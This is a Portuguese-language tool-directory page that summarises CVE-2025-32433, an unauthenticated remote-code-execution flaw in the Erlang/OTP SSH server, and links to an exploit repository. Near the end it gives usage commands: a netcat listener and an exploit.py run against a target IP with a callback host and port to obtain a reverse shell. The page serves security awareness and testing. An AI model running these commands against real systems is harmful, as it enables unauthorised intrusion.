Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32433 — CVE-2025-32433 Summary and Attack Overview | Kitploit
Ferramentas/GitHubGitHub/mrdreamreal/cve-2025-32433
Payload GenerationVulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 Summary and Attack Overview

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-32433

Resumo e visão geral do ataque da CVE-2025-32433

A CVE-2025-32433 é uma vulnerabilidade crítica de execução remota de código (RCE) não autenticada no servidor SSH do Erlang/OTP, divulgada em 16 de abril de 2025. O Erlang/OTP SSH é uma biblioteca usada em várias aplicações distribuídas e de telecomunicações. A falha surge do tratamento inadequado das mensagens do protocolo SSH: o servidor não impõe a sequência normal de autenticação, permitindo que um invasor envie mensagens SSH especialmente criadas antes da autenticação. Ao fazer isso, o invasor pode injetar e executar código Erlang arbitrário no servidor​ nvd.nist.gov ​ offsec.com . Em termos práticos, isso significa que um invasor com acesso à rede a um servidor SSH Erlang/OTP vulnerável (muitas vezes executando como root) pode desencadear um shell reverso ou executar comandos sem qualquer credencial, levando ao comprometimento total do sistema​ nvd.nist.gov ​ offsec.com . Esta vulnerabilidade recebeu CVSS 10.0 (gravidade máxima)​ offsec.com .

As versões afetadas são todas as versões do Erlang/OTP abaixo de OTP-27.3.3, OTP-26.2.5.11 ou OTP-25.3.2.20 (as versões corrigidas)​ nvd.nist.gov ​ offsec.com . Os sistemas afetados frequentemente incluem servidores Linux ou appliances executando um daemon SSH baseado em Erlang (não confundir com OpenSSH). É importante notar que servidores OpenSSH padrão em Linux/BSD não são vulneráveis​ offsec.com . Os usuários devem assumir que qualquer servidor SSH Erlang/OTP exposto está afetado e aplicar os patches oficiais ou desabilitar o serviço SSH imediatamente.

O ataque funciona iniciando uma conexão SSH e então enviando uma sequência de mensagens SSH fora de ordem. :

uso:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

ex:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

Baixar ferramenta